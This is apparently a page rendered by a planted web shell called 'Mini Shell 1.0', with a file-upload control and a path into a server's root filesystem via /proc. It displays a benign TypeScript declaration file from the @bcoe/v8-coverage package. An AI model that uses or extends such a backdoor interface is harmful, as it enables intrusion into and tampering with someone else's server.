HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/node_modules/@bcoe/v8-coverage/dist/lib/
Upload File :
Current File : //proc/1784574/root/usr/share/node_modules/@bcoe/v8-coverage/dist/lib/ascii.d.ts
import { RangeCov } from "./types";
interface ReadonlyRangeTree {
    readonly start: number;
    readonly end: number;
    readonly count: number;
    readonly children: ReadonlyRangeTree[];
}
export declare function emitForest(trees: ReadonlyArray<ReadonlyRangeTree>): string;
export declare function emitForestLines(trees: ReadonlyArray<ReadonlyRangeTree>): string[];
export declare function parseFunctionRanges(text: string, offsetMap: Map<number, number>): RangeCov[];
export declare function parseOffsets(text: string): Map<number, number>;
export {};